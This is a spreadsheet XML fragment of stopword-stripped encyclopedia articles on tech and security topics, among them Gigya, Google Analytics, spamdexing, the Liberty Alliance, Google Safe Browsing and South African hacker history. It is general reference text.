    <t>gigya, inc. technology company founded aviv, israel headquartered mountain view, california additional offices york, aviv, london, paris, hamburg, sydney. offering gigya offers customer identity management platform managing profiles, preference, opt-in consent settings. gigya's technology used many corporations including fox, forbes, repsol, toyota, netherlands, campbells, fairfax media, wacom, asos, turner according company's website. gigya offers identity management platform businesses includes products customized registration, social login, user profile preference management, user engagement loyalty, integrations third-party marketing services platforms. history gigya founded aviv, israel 2006. patrick salyer became march 2011. gigya worked hybris since 2013. november 2014, gigya raised $104m intel capital, benchmark capital, mayfield fund, first round capital, advance publications (parent company condé nast), ventures, common fund capital, vintage investment partners, greenspring associates. software maker adobe systems also investor. 2017 press release, gigya named leader "the forrester wave: customer identity access management, 2017."in september 2017, company acquired $350 million. october 2017, gigya introduced enterprise preference manager address privacy regulations. 2014 hacking incident november 2014, syrian electronic army hijacked gigya.com domain changing configuration domain registrar directly, outside gigya's system control. shortly incident, gigya, patrick salyer confirmed news officially gigya's blog stating data compromised, issue resolved within hour gigya identifying issue. next day, november 2014, syrian electronic army issued statement taking responsibility attack. also economy israel science technology israel references external links gigya official website</t>
  </si>
  <si>
    <t>Securax</t>
  </si>
  <si>
    <t>securax (1998–2002) considered belgium's strongest hacking movements past twenty years founded filip maertens co-founded davy moere online community order combine skills experiences domain vulnerability identification, zero-day exploit creation penetration testing methods. movement known critical insights information security industry, bold press interviews near-daily newsletter dutch).at peak, newsletter read 90,000 dutch-speaking readers, professionals non-professionals. september 1999, companies could make knowledge "legal intrusion tests", securax assembled high quality skilled tiger teams perform projects. 2000 securax made choice walk thin line attaining community security experts hackers, offering commercial services enterprise level. 2002 community disbanded. references</t>
  </si>
  <si>
    <t>Spanish Data Protection Agency</t>
  </si>
  <si>
    <t>spanish data protection agency (aepd, spanish: agencia española protección datos) independent agency government spain oversees compliance legal provisions protection personal data. agency headquartered city madrid extends authority whole country. apart aepd, regional data protection agencies. these agencies limited access files public administrations information remains responsibility national agency. currently regional agencies: catalan data protection authority basque data protection agency. from 1995 2013, also data protection agency community madrid. legal basis foundation aepd established royal decree 428/1993 march, amended organic 15/1999 protection personal data. this amendment implemented directive 95/46/ec. agency created context spanish constitution 1978, article 18.4, stating "the shall restrict informatics order protect honour personal family privacy spanish citizens, well full exercise rights" elaborated organic 5/1992. major activities aepd public authority enjoying "absolute independence public administration". responsible for: information awareness activities right protection personal data (including interviews "impacts" media) direct assistance response citizen queries (47,741 2007) procedures protect rights individuals access, rectify, cancel, object. most common processes cancel (62%) access (32%) registry filing systems (1,017,266 total entries) inspection sanction procedures (399 sanction procedures resolved €19.6 million fines) advocacy leading royal decree 1720/2007 cooperation international agencies autonomous communities catalonia, basque country, madrid evaluation emerging risks, including personal data internet, generalisation video surveillance systems, employer monitoring labor video surveillance, biometrics, internet usage, intensification international data flowsin response latter point, aepd advocated: developing procedures allowing copyright protection manner compatible fundamental right data protection regulating anonymized publication judgements passed courts regulating internal whistleblowing systems available workers within companies, outlining activities necessary establish systems guaranteeing confidentiality reporting rights reported development specific public policy plans protection minors internet increased caution order prevent undesirable exchange sensitive personal data internet networks fostering self-regulation among media guarantee privacy protection personal data, encouraging respect usage relation data protection provisions citizen guideline actions regarding guarantees confidentiality recipients emails plan fostering good practices terms guaranteeing privacy official gazettes journals, adopting measures that, without affecting purpose, limit gathering personal information internet search engines local strategy aimed conforming installation traffic control cameras provisions protection personal data notable cases aepd conducting anti-spam investigations since 2004, collaborating foreign agencies united states federal trade commission.the aepd come conflict google information gathered wi-fi networks google street view images taken, asserting verified data location wifi networks, identification owners, personal data diverse nature communications, names surnames, messages associated accounts message services, user codes passwords" collected. also demanded removal approximately names search results, claiming "right forgotten". google contesting actions. also general data protection regulation references external links official website</t>
  </si>
  <si>
    <t>Google Analytics</t>
  </si>
  <si>
    <t>google analytics analytics service offered google tracks reports website traffic, currently platform inside google marketing platform brand. google launched service november 2005 acquiring urchin.as 2019, google analytics widely used analytics service web. google analytics provides allows gathering usage data android app, known google analytics mobile apps. google analytics blocked browsers, browser extensions, firewalls means. google analytics undergone many updates since inception currently iteration ga4. default google analytics installation, renamed version (app web) property google released 2019 beta form. also replaced universal analytics (ua). notable feature natural integration google's bigquery feature previously available enterprise 360. this move indicates efforts google integrate free users wider cloud offering.according statement made google (march 2022) universal analytics stop collecting data july 2023, google analytics replace users able universal analytics july 2023 deadline, data added sunset according google. features google analytics used track website activity session duration, pages session bounce rate individuals using site, along information source traffic. integrated google ads, users create review online campaigns tracking landing page quality conversions (goals). goals might include sales, lead generation, viewing specific page, downloading particular file. google analytics' approach show high-level, dashboard-type data casual user, in-depth data report set. google analytics analysis identify poorly performing pages techniques funnel visualization, visitors came (referrers), long stayed website geographical position. also provides advanced features, including custom visitor segmentation. google analytics e-commerce reporting track sales activity performance. e-commerce reports show site's transactions, revenue, many commerce-related metrics.on september 2011, google analytics launched real-time analytics, enabling user insights visitors currently site. user site profiles. each profile generally corresponds website. limited sites online traffic fewer million page views month (roughly page-views second) unless site linked google campaign. google analytics includes google website optimizer, re-branded google analytics content experiments. google analytics' cohort analysis helps understanding behavior component groups users apart user population. beneficial marketers analysts successful implementation marketing strategy. latest version google analytics, commonly referred ga4, encompasses additional features focusing predictions, customizability, privacy. some features listed concept allow property used website mobile app, ai-powered predictive metrics supported machine learning, customizable, easy-to-navigate homepage, explore section provide completely custom reports specific business needs, built-in debugview analyze debug upcoming data instantly, anomaly detection, improved e-commerce reports. history google acquired urchin software corp. april 2005. google's service developed urchin demand. system also brings ideas adaptive path, whose product, measure map, acquired used redesign google analytics 2006. google continued sell standalone, installable urchin webanalytics software network value-added resellers discontinuation march 2012. google-branded version rolled november 2005 anyone wished sign however, extremely high demand service, sign-ups suspended week later. capacity added system, google began using lottery-type invitation-code model. before august 2006, google sending batches invitation codes server availability permitted; since mid-august 2006 service fully available users whether google advertising not.the newer version google analytics tracking code known asynchronous tracking code, google claims sensitive accurate, able track short activities website. previous version delayed page loading, performance reasons, generally placed &lt;/body&gt; body close html tag. code placed &lt;head&gt; &lt;/head&gt; html head tags because, triggered, runs parallel page loading. april 2011 google announced availability version google analytics featuring multiple dashboards, custom report options, interface design. this version later updated features real-time analytics goal flow charts.in october 2012 another version google analytics announced, called universal analytics. differences previous versions were: cross-platform tracking, flexible tracking code collect data device, introduction custom dimensions custom metrics.in march 2016, google released google analytics 360, software suite provides analytics return investment marketing indicators. google analytics includes seven main products: analytics, manager, optimize, data studio, surveys, attribution, audience center.in october 2017 methodology collect data google analytics announced, called global site tag, gtag.js. stated purpose unify tagging system simplify implementation. this type alternative existing analytics.js type google manager.in june 2018, google introduced google marketing platform, online advertisement analytics brand. consists former brands google, doubleclick digital marketing google analytics 360.in october 2020, google released google analytics acronym ga4.instead "hit-based," like universal analytics, "event-based." march 2022, google announced july 2023, standard universal analytics properties stop processing hits. users need upgrade ga4. technology google analytics implemented "page tags", case, called google analytics tracking code, snippet javascript code website owner adds every page website. tracking code runs client browser client browses page javascript enabled browser) collects visitor data sends google data collection server part request beacon.the tracking code loads larger javascript file google server sets variables user's account number. larger file (currently known ga.js) typically 2018. file usually loaded, however, browser caching. assuming caching enabled browser, downloads ga.js start visit. furthermore, websites implement google analytics ga.js code master file google, browser previously visited website running google analytics already file cached machine. addition transmitting information google server, tracking code sets first party cookie cookies enabled browser) visitor's computer. this cookie stores anonymous information called clientid. before launch universal analytics, several cookies storing information whether visitor site (new returning visitor), timestamp current visit, referrer site campaign directed visitor page (e.g., search engine, keywords, banner, email). visitor arrived site clicking link tagged parameters (urchin tracking module) https://www.example.com/page&lt;/nowiki&gt;?utm_content=buffercf3b2&amp;utm_medium=social&amp;utm_source=facebook.com&amp;utm_campaign=bufferthen values passed database too. limitations addition, google analytics mobile package allows google analytics applied mobile websites. mobile package contains server-side tracking codes php, javaserver pages, asp.net, perl server-side language. however, many filtering programs extensions firefox's enhanced tracking protection, browser extension noscript mobile phone disconnect mobile block google analytics tracking code. this prevents traffic users tracked leads holes collected data. also, privacy networks like mask user's actual location present inaccurate geographical data. small fraction users javascript-enabled/capable browsers turn feature off. these limitations, mainly filtering programs, allow significant number—sometimes majority—of visitors avoid tracker.one potential impact data accuracy comes users deleting blocking google analytics cookies. without cookies set, google analytics cannot collect data. individual user block delete cookies resulting data loss visits google analytics users. website owners encourage users disable cookies example, making visitors comfortable using site posting privacy policy. user navigates pages, google analytics provides website owners javascript tags (libraries) record information page user seen, example page. google analytics javascript libraries uses http cookies, remembers user done previous pages interactions.another limitation google analytics large websites sampling generation many reports. reduce load servers provide users relatively quick response query, google analytics limits reports 500,000 randomly sampled sessions profile level calculations. while margins error indicated visits metric, margins error provided metrics google analytics reports. small segments data, margin error large.one biggest limitation google analytics, inability track attribute offline conversions. offline conversion tracking required measure impact online marketing campaigns "offline" environments, point sale, call centers, affiliate networks, payment gateways. since google analytics javascript website, visitor switch website environment phone conversation, tracking lost, "call center" activity can't directly linked initial visit visitor. third-party tools integrated google analytics, capable tracking customer journey online offline environments. performance there several online discussions impact google analytics site performance. however, google introduced asynchronous javascript code december 2009 reduce risk slowing loading pages tagged ga.js script. privacy ubiquity, google analytics raises privacy concerns. whenever someone visits website uses google analytics, google tracks visit users' address order determine user's approximate geographic location. meet german legal requirements, google analytics anonymize address. google also released browser plug-in turns data page visit sent google, however, browser extension available mobile browsers. since plug-in produced distributed google itself, much discussion criticism. furthermore, realization google scripts tracking user behavior spawned production multiple, often open-source, browser plug-ins reject tracking cookies. these plug-ins allow users block google analytics similar sites tracking activities. many browsers allow users reject third-party cookies tracking scripts, cases default option. anecdotally reported errors occur behind proxy servers multiple firewalls, changing timestamps registering invalid searches. webmasters seek mitigate google analytics' specific privacy issues employ number alternatives backends hosted machines. until discontinuation, example product urchin webanalytics software google itself. january 2015, associated press reported healthcare.gov providing access enrollees' personal data private companies specialized advertising, mentioning google analytics specifically. additionally, 2022, countries austria, france, italy prohibited service lets webmaster tools track analyse site traffic. government stated decisions information collected cookies transmitted united states could potentially seen third parties government could breech gdpr users ensured process redness.the version google analytics, also known ga4, equipped deeper anonymization user data anonymizes addresses users default, meaning possible perform changes setting. support training google offers free google analytics lessons, google analytics certification test, free help center google groups forum official google analytics product support. product features announced google analytics blog. enterprise support provided google analytics certified partners google academy ads. third-party support google analytics used third parties build custom applications reporting tools. many applications exist. built (apple) devices featured apple's store. there third-party products also provide google analytics-based tracking. management api, core reporting api, reporting api, real time reporting subject limits quotas. popularity google analytics widely used website statistics service. 2008, pingdom released survey stating (32%) biggest sites globally according alexa rank using google analytics.a later piece market share analysis claimed google analytics used around 49.95% 1,000,000 websites ranked 2010 alexa internet).in 2012, around 10,000 popular websites. april 2022, google analytics used 73.7% 10,000 popular websites ordered popularity, reported builtwith. also google search console service google webmasters google trends popularity analysis search queries list analytics software references external links official website official blog google marketing platform google analytics help google analytics</t>
  </si>
  <si>
    <t>Liberating Ourselves Locally</t>
  </si>
  <si>
    <t>liberating ourselves locally makerspace/hackerspace fruitvale district oakland, california. part area consortium hackerspaces (bach).lol! place people learn skills, soldering video game design, operates principle members local community involved aspects creating things sustain people, food, clothing, energy, technology, shelter, art. history lol! founded 2011 group people including jen-mei software engineer praveen sinha.mentors many professional fields volunteer time share professional knowledge. lol! close ties francisco area hackerspaces including sudo room, noisebridge, mothership hackermoms. project areas also double union references external links official website</t>
  </si>
  <si>
    <t>Spanish Cybersecurity Research Conference</t>
  </si>
  <si>
    <t>spanish cybersecurity research conference (spanish: jornadas nacionales investigación ciberseguridad (jnic)), scientific congress works meeting point different actors working field cybersecurity research (universities, technological research centres, companies public authorities) exchange knowledge experience shared goal strengthening research cybersecurity field national level. goals need kind conferences identified drafting summary report feasibility study design network centers excellence cybersecurity, consensus participants. strategic plan spanish network excellence cybersecurity research included measure #17, creation national cybsersecurity r&amp;d+i conferences, intended scientific meeting point network excellence particular research ecosystem general could demonstrate capacities, terms knowledge talent terms research findings potential transference market. equally, measure study, proposed design open call proposals mechanisms evaluate select candidates order grant awards acknowledgement research excellence. organizers each edition conferences organised institution selected according procedure laid regulation jnic.an organising committee named based regulations established jnic, general chair committee representative organising institution responsible event. spanish national cybersecurity institute (incibe) mission support research cybersecurity strengthening cybersecurity sector, collaborates organization conference. technology transfer program with converting jnic scientific forum excellence national cybersecurity field promotes innovation, first time 2017 edition, complete [1]technological transfer program designed, instrument bring final users (companies, organisms, etc.) contact researchers order solve cybersecurity problems unresolved, formulated scientific challenges. this initiative several years 2021 edition, helping promote technology transfer. current edition jnic 2023, held vigo june 2023 organized atlanttic (university vigo) gradiant (foundation). past editions jnic2015, held león september 2015 organized universidad león. jnic2016 held granada, june 2016 organized universidad granada. jnic2017, held madrid, may, june 2017 organized universidad juan carlos. jnic2018, held sebastián, june 2018 organized universidad mondragón. jnic2019, held cáceres, spain, june 2019 organized university extremadura, computaex foundation complutense university madrid. jnic2020, postponed 2021 result situation generated coronavirus pandemic (covid-19). jnic 2021 live, held online june 2021 organized university castilla–la mancha. jnic 2022, held bilbao, june 2022 organized tecnalia. references</t>
  </si>
  <si>
    <t>Google Code-in</t>
  </si>
  <si>
    <t>google code-in (gci) international annual programming competition hosted google allowed pre-university students complete tasks specified various, partnering open source organizations. contest originally google highly open participation contest, 2010, format modified current state. students completed tasks certificates t-shirts. each organization also selected grand prize award winners would earn free trip google's headquarters located mountain view, california. 2020, google announced cancellation contest. history program began google highly open participation contest 2007–2008 aimed high school students. contest designed encourage high school students participate open source projects. 2010, program modified google code-in. after 2014 edition, google melange replaced separate website google code-in. mauritius, african country, participated first time 2016, noticed strong debut 2017, produced first grand prize winner.the contest open students thirteen years older enrolled high school equivalent pre-university secondary school program). prizes offered google included contest t-shirt participation certificate completing least task us$100 every three tasks completed maximum us$500. there grand prize trip google headquarters award ceremony. each participating open source project selected contestant receive grand prize, total grand prize winners. statistics eligibility students must years (inclusive) participate. addition, students must upload parental consent forms well documentation proving enrollment pre-university program. program google partners certain open source organizations, previous experience working google open source programs like google summer code. these organizations come "bite-sized" tasks self-contained, designed pre-university students complete. when contest begins, students register claim tasks. once claimed, students period time complete task receive help mentor organization's community. students deadline extensions needed. prizes students complete task earn certificate. students complete three tasks earn t-shirt addition certificate. there maximum t-shirt certificate student. competition, organization choose students grand prize award winners visit google's mountain view, california, headquarters four-day trip awards ceremony, opportunity meet google engineers, sightseeing francisco. also list computer-related awards references external links https://codein.withgoogle.com</t>
  </si>
  <si>
    <t>Google Data Studio</t>
  </si>
  <si>
    <t>google data studio online tool converting data customizable informative reports dashboards introduced google march 2016 part enterprise google analytics suite. 2016 google announced free version data studio individuals small teams. google data studio part google marketing platform. also list google products analytics data visualization references external links official website</t>
  </si>
  <si>
    <t>Spamdexing</t>
  </si>
  <si>
    <t>spamdexing (also known search engine spam, search engine poisoning, black-hat search engine optimization, search spam spam) deliberate manipulation search engine indexes. involves number methods, link building repeating unrelated phrases, manipulate relevance prominence resources indexed, manner inconsistent purpose indexing system.spamdexing could considered part search engine optimization, although many search engine optimization methods improve quality appearance content sites serve content useful many users.search engines variety algorithms determine relevancy ranking. some include determining whether search term appears body text page. many search engines check instances spamdexing remove suspect pages indexes. also, search-engine operators quickly block results listing entire websites spamdexing, perhaps response user complaints false matches. rise spamdexing mid-1990s made leading search engines time less useful. using unethical methods make websites rank higher search engine results otherwise would commonly referred (search engine optimization) industry "black-hat seo". these methods focused breaking search-engine-promotion rules guidelines. addition this, perpetrators risk websites severely penalized google panda google penguin search-results ranking algorithms.common spamdexing techniques classified broad classes: content spam term spam) link spam. history earliest known reference term spamdexing eric convey article "porn sneaks back web," boston herald, 1996, said: problem arises site operators load pages hundreds extraneous terms search engines list among legitimate addresses. process called "spamdexing," combination spamming internet term sending users unsolicited information "indexing." content spam these techniques involve altering logical view search engine page's contents. they variants vector space model information retrieval text collections. keyword stuffing keyword stuffing involves calculated placement keywords within page raise keyword count, variety, density page. this useful make page appear relevant crawler makes likely found. example: promoter ponzi scheme wants attract surfers site advertises scam. places hidden text appropriate page popular music group page, hoping page listed site receive many visits music lovers. older versions indexing programs simply counted often keyword appeared, used determine relevance levels. most modern search engines ability analyze page keyword stuffing determine whether frequency consistent sites created specifically attract search engine traffic. also, large webpages truncated, massive dictionary lists cannot indexed single webpage. (however, spammers circumvent webpage-size limitation merely setting multiple webpages, either independently linked other.) hidden invisible text unrelated hidden text disguised making color background, using tiny font size, hiding within html code frame" sections, attributes, zero-sized divs, script" sections. people manually screening red-flagged websites search-engine company might temporarily permanently block entire website invisible text pages. however, hidden text always spamdexing: also used enhance accessibility. meta-tag stuffing this involves repeating keywords meta tags, using meta keywords unrelated site's content. this tactic ineffective since 2005. doorway pages "gateway" doorway pages low-quality pages created little content, instead stuffed similar keywords phrases. they designed rank highly within search results, serve purpose visitors looking information. doorway page generally "click enter" page; autoforwarding also used purpose. 2006, google ousted vehicle manufacturer using "doorway pages" company's german site, bmw.de. scraper sites scraper sites created using various programs designed "scrape" search-engine results pages sources content create "content" website. specific presentation content sites unique, merely amalgamation content taken sources, often without permission. such websites generally full advertising (such pay-per-click ads), redirect user sites. even feasible scraper sites outrank original websites information organization names. article spinning article spinning involves rewriting existing articles, opposed merely scraping content sites, avoid penalties imposed search engines duplicate content. this process undertaken hired writers automated using thesaurus database neural network. machine translation similarly article spinning, sites machine translation render content several languages, human editing, resulting unintelligible texts nonetheless continue indexed search engines, thereby attracting traffic. link spam link spam defined links pages present reasons merit. link spam takes advantage link-based ranking algorithms, gives websites higher rankings highly ranked websites link these techniques also influencing link-based ranking techniques hits algorithm. link farms link farms tightly-knit networks websites link sole purpose exploiting search engine ranking algorithms. these also known facetiously mutual admiration societies. links farms greatly reduced launch google's first panda update february 2011, introduced significant improvements spam-detection algorithm. private blog networks blog networks (pbns) group authoritative websites used source contextual links point owner's main website achieve higher search engine ranking. owners websites expired domains auction domains backlinks high-authority websites. google targeted penalized users several occasions several massive deindexing campaigns since 2014. hidden links putting hyperlinks visitors used increase link popularity. highlighted link text help rank webpage higher matching phrase. sybil attack sybil attack forging multiple identities malicious intent, named famous dissociative identity disorder patient "sybil". spammer create multiple sites different domain names link other, fake blogs (known spam blogs). spam blogs spam blogs blogs created solely commercial promotion passage link authority target sites. often "splogs" designed misleading manner give effect legitimate website upon close inspection often written using spinning software poorly written barely readable content. they similar nature link farms. guest blog spam guest blog spam process placing guest blogs websites sole purpose gaining link another website websites. unfortunately, often confused legitimate forms guest blogging motives placing links. this technique made famous matt cutts, publicly declared "war" form link spam. buying expired domains some link spammers utilize expired domain crawler software monitor records domains expire soon, expire replace pages links pages. however, possible confirmed google resets link data expired domains. maintain previous google ranking data domain, advisable buyer grab domain "dropped". some techniques applied creating google bomb cooperate users boost ranking particular page particular query. cookie stuffing cookie stuffing involves placing affiliate tracking cookie website visitor's computer without knowledge, generate revenue person cookie stuffing. this generates fraudulent affiliate sales, also potential overwrite affiliates' cookies, essentially stealing legitimately earned commissions. using world-writable pages sites edited users used spamdexers insert links spam sites appropriate anti-spam measures taken. automated spambots rapidly make user-editable portion site unusable. programmers developed variety automated spam prevention techniques block least slow spambots. spam blogs spam blogs placing solicitation links randomly sites, placing desired keyword hyperlinked text inbound link. guest books, forums, blogs, site accepts visitors' comments particular targets often victims drive-by spamming automated software creates nonsense posts links usually irrelevant unwanted. comment spam comment spam form link spam arisen pages allow dynamic user editing wikis, blogs, guestbooks. problematic agents written automatically randomly select user edited page, wikipedia article, spamming links. wiki spam wiki spam spammer uses open editability wiki systems place links wiki site spam site. referrer spamming referrer spam takes place spam perpetrator facilitator accesses page (the referee), following link another page (the referrer), referee given address referrer person's internet browser. some websites referrer shows pages link site. robot randomly access many sites enough times, message specific address given referrer, message internet address appears referrer sites referrer logs. since search engines base importance sites number different sites linking them, referrer-log spam increase search engine rankings spammer's sites. also, site administrators notice referrer entries logs follow link back spammer's referrer page. countermeasures because large amount spam posted user-editable webpages, google proposed "nofollow" could embedded links. link-based search engine, google's pagerank system, link increase score linked website link carries nofollow tag. this ensures spamming links user-editable websites raise sites ranking search engines. nofollow used several major websites, including wordpress, blogger wikipedia. other types mirror websites mirror site hosting multiple websites conceptually similar content using different urls. some search engines give higher rank results keyword searched appears url. redirection redirection taking user another page without intervention, e.g., using meta refresh tags, flash, javascript, java server side redirects. however, redirect, permanent redirect, considered malicious behavior. cloaking cloaking refers several means serve page search-engine spider different seen human users. attempt mislead search engines regarding content particular site. cloaking, however, also used ethically increase accessibility site users disabilities provide human users content search engines able process parse. also used deliver content based user's location; google uses delivery, form cloaking, deliver results. another form cloaking code swapping, i.e., optimizing page ranking swapping another page place ranking achieved. google refers type redirects sneaky redirects. countermeasures page omission search engine spamdexed pages sometimes eliminated search results search engine. page omission user users employ search operators filtering. google, keyword preceded (minus) omit sites contains keyword pages pages search result. example, search "-&lt;unwanted site&gt;" eliminate sites contains word "&lt;unwanted site&gt;" pages pages whose contains "&lt;unwanted site&gt;". users could also google chrome extension "personal blocklist google)", launched google 2011 part countermeasures content farming. extension, users could block specific page, pages appearing search results. 2021, original extension appears removed, although similar-functioning extensions used. also adversarial information retrieval index (search engine) overview search engine indexing technology trustrank scraping microsoft smartscreen microsoft defender references external links</t>
  </si>
  <si>
    <t>Liberty Alliance</t>
  </si>
  <si>
    <t>liberty alliance project organization formed september 2001 establish standards, guidelines best practices identity management computer systems. grew organizations, including technology vendors, consumer-facing companies, educational organizations governments. released frameworks federation, identity assurance, identity governance framework, identity services. 2009, kantara initiative took work liberty alliance. history group originally conceived named jeff veis, microsystems based menlo park, california. initiative's goal, personally promoted scott mcnealy sun, unify technology, commercial government organizations create standard federated, identity-based internet applications alternative technology appearing marketplace controlled single entity microsoft's passport. another microsoft initiative, hailstorm, renamed services quietly shelved april 2002. positioned group independent, eric dean united airlines became president. identity federation july 2002, alliance announced liberty identity federation (id-ff) 1.0. time, several member companies announced upcoming availability liberty-enabled products. liberty federation allowed consumers users internet-based services e-commerce applications authenticate sign-on network domain device visit take part services multiple sites. this federated approach require user re-authenticate support privacy controls established user. liberty alliance subsequently released versions identity federation framework, november 2003, liberty contributed final version specification, id-ff 1.2, oasis. this contribution formed basis saml 2.0. 2007, industry analyst firm gartner claimed saml gained wide acceptance community. identity services liberty alliance releasing liberty identity services framework (id-wsf) april 2004 deploying managing identity-based services. applications included geo-location, contact book, calendar, mobile messaging people service, managing social applications bookmarks, blogs, calendars, photo sharing instant messaging secure privacy-respecting federated social network. 2008 marketing report recommended considering federation. certification alliance introduced certification program 2003, designed test commercial open source products published standards assure base levels interoperability products. 2007, general services administration began requiring certification participating e-authentication identity federation. openliberty.org january 2007, alliance announced project open-source software developers building identity-based applications. openliberty.org portal developers collaborate access tools information develop applications based alliance standards. november 2008, openliberty released open source application programming interface called arisid. identity governance framework february 2007 oracle corporation contributed identity governance framework alliance, released first version publicly july 2007. identity governance framework defined identity related information used, stored, propagated using protocols ldap, security assertion markup language, ws-trust, id-wsf. identity assurance framework liberty alliance began work identity assurance framework 2008. identity assurance framework (iaf) detailed four identity assurance levels designed link trusted identity-enabled enterprise, social networking applications together based business rules security risks associated level. four levels assurance outlined 2006 document national institute standards technology. level assurance provided measured strength rigor identity proofing process, credential's strength, management processes service provider applies these four assurance levels adopted canada, government services. concordia project 2007 liberty alliance helped found project concordia, independent initiative harmonization identity specifications. active 2008. privacy policy alliance wrote papers business policy aspects identity management. hosted meetings 2007 2008 promote itself. membership management board members included aol, british telecom, computer associates (ca), fidelity investments, intel, internet society (isoc), novell, nippon telegraph telephone (ntt), oracle corporation microsystems. also indieauth windows cardspace yadis openid oauth identity management systems references external links liberty alliance site openliberty project liberty id-ff archive described above, liberty contributed identity federation framework (id-ff) oasis november 2003. record, complete list contributed id-ff documents: only archived files individually addressable liberty alliance site. (the original contributed documents lost.) obtain copies remaining archived files, download liberty id-ff archive liberty support archive.</t>
  </si>
  <si>
    <t>Google Marketing Platform</t>
  </si>
  <si>
    <t>google marketing platform online advertising analytics platform developed google launched july 2018. unifies doubleclick's advertising services (acquired march 2008) google's advertising analytics services. google marketing platform mainly used advertisers internet.google (launched 2000) google manager (launched 2010) parts google marketing platform. three brands complementary tools targeting different types buyers presenting slightly different features. however, addition google marketing platform google's previous offers causes confusion people looking google. services google marketing platform includes following services: display video (demand-side platform) search (search advertising) campaign manager management measurement) google analytics (web analytics) google manager (tag management) google optimize (web analytics) google data studio (web analytics) google surveys (market research) references external links official website</t>
  </si>
  <si>
    <t>Spam blog</t>
  </si>
  <si>
    <t>spam blog, also known auto blog neologism splog, blog author uses promote affiliated websites, increase search engine rankings associated sites simply sell links/ads. purpose splog increase pagerank backlink portfolio affiliate websites, artificially inflate paid impressions visitors (see made adsense mfa-blogs), and/or blog link outlet sell links sites indexed. spam blogs usually type scraper site, content often either inauthentic text merely stolen (see blog scraping) websites. these blogs usually contain high number links sites associated splog creator often disreputable otherwise useless websites. this used often conjunction spamming techniques, including spings. history term splog popularized around august 2005 used publicly mark cuban, developed multiple linkblogs trying influence search indexes others trying google bomb every word dictionary. also adversarial information retrieval captcha blog scraping link farm spam blogs spamdexing references external links blogger: about spam blogs svms blogosphere: blog identification splog detection news.com.com: "tempted blogs, spam becomes 'splog'" guardian, november 2005, "cashing fake blogs"</t>
  </si>
  <si>
    <t>Google Safe Browsing</t>
  </si>
  <si>
    <t>google safe browsing service google attempts help protect devices showing warnings users attempt navigate dangerous sites download dangerous files. safe browsing also notifies webmasters websites compromised malicious actors helps diagnose resolve problem visitors stay safe. this protection works across google products claimed “power safer browsing experiences across internet”. lists urls resources contain malware phishing content. browsers like google chrome, safari, firefox, vivaldi, brave gnome lists google safe browsing service check pages potential threats. google also provides public service.google provides information internet service providers, sending e-mail alerts autonomous system operators regarding threats hosted networks.according google september 2017, billion internet devices protected service. alternatives offered tencent yandex. clients protected browsers: google chrome, safari, firefox, vivaldi, brave gnome web. android: google play protect, verify apps google search google adsense gmail instagram privacy google maintains safe browsing lookup api, privacy drawback: "the urls looked hashed server knows urls users looked up". safe browsing update api, hand, compares 32-bit hash prefixes preserve privacy. chrome, firefox safari browsers latter.safe browsing also stores mandatory preferences cookie computer.google safe browsing "conducts client-side checks. website looks suspicious, sends subset likely phishing social engineering terms found page google obtain additional information available google's servers whether website considered malicious". logs, include address cookies, kept weeks tied safe browsing requests made device. criticism websites containing malware blacklisted google safe browsing presence infected ads. requesting removal blacklist requires webmaster create google webmaster's tool account wait several days removal come effect. there also concerns google safe browsing used censorious purposes future, however occurred. also anti-phishing software stopbadware response policy zone censorship references external links safe browsing homepage transparency report: safe browsing</t>
  </si>
  <si>
    <t>South African hacker history</t>
  </si>
  <si>
    <t>brief history computer hacking south africa. note: distinction needs made "white hat" hacker hacks intellectual curiosity, "black hat" hacker ulterior motives. recent times attempt restore meaning term hacker, still associated creating code, secondary meaning, become stuff hollywood legend. term "cracker" better description break secured system exploiting computer vulnerabilities. 1990 activists trapped boss agents autotellers monitor transactions. subject ongoing court case active support apartheid regime. 1991 cape educational computer society (cecs) becomes first advocate free software culture south africa. many hackers gain first experience online world douglas reeler's modem. also 1991, kagenna magazine publishes article cyberpunk leary, first time word mentioned print south africa. 1994 right-wing hacker attempts sabotage election results hacking computers processing election results south africas first democratic election. 2004 group computer hackers calling "spykids" strikes cape town business websites defaces home pages. 1998 police arrest teenage rondebosch hacked security features south african telecommunications company telkom's computer system apparently damage.the party website defaced hacker. 1999 hackers break south africa's official statistics website, replacing economic information critical comments national telephone company, telkom. 2005 "team evil", group moroccan hackers, defaces south african websites afternoon january, anti-american propaganda. 2006 first national bank, standard absa banks targets several successful online attacks. financial institutions report less bank accounts hacked. value damages caused attack estimated 80.000 dollars. 2008 h.o.z, currently largest south african hacker community goes online, quickly gains reputation bypassing local cell network internet restrictions. although authorities unable point master minds behind incidents, s.a. anti-cyber terrorism, vows stay tunes community members hopes stop elite members hacking community, paying close attention site owner evilwez.south african minister finance economic development, announces arrests connection separate fraud counts related spyware loss (13m pounds) r130m. 2009 hackers expose corrupt business practice banking system confidential document detailing information south african banks published wikileaks. 2010 second live hacking 2010 south africa ethical hacking workshop held pretoria.courses ethical hacking offered.gauteng's department local government's website hacked cecen hack team appear radical islamic grouphackingstats.com online resource "monitoring documenting hacked south african-based websites" goes online. 2011 police unit, hawks announce verge making arrests connection "multi-million rand cyber raid" land bank christmas season. 2012 three government websites hacked december lone activist apparently angered south africa's support saharawi arab democratic republic western sahara. 2013 "south africa needs saved freed corruption", says team ghostshell, luckily assembled "strong force" hacktivists equal task. that force break government information vaults bring light evidence reveal corruption nefarious doings."through series tweets 'data dump' using account @domaineranon, explained hacked website “for miners killed clashes police marikana august 2012”. references</t>
  </si>
  <si>
    <t>Google Summer of Code</t>
  </si>
  <si>
    <t>google summer code, often abbreviated gsoc, international annual program google awards stipends contributors successfully complete free open-source software coding project summer. 2022, program open anyone aged over, longer students recent graduates. first held august 2005. participants paid write software, amount stipend depending purchasing power parity country located. project ideas listed host organizations involved open-source software development, though students also propose project ideas. idea summer code came directly google's founders, sergey brin larry page. from 2007 2009 leslie hawthorn, involved project since 2006, program manager. from 2010 2015, carol smith program manager. 2016, stephanie taylor took management program. overview each year, program follows timeline. first, open-source organizations apply participate. accepted, organization provides list initial project ideas invites contributors development communities. contributors meet eligibility criteria submit proposals detail software-coding projects interest them. these applications evaluated corresponding mentoring organization, mentors organizational administrators reviewing applications deciding many "slots" request google, proposals accept. google allocates slots organization, taking account organizational capacity, mentoring history, number applications organization received. finally, organizations select proposals fill slots google verifies eligibility announcing accepted contributors. event single contributors selected organization, organization allocates slot student first given priority. history 2005 2005, 8,740 project proposals submitted available student positions. overwhelming response, google expanded program positions. mentoring organizations responsible reviewing selecting proposals, providing guidance students help complete proposal. students successfully completed proposal satisfaction mentoring organization awarded $4500 google summer code t-shirt, $500 project sent mentoring organization. 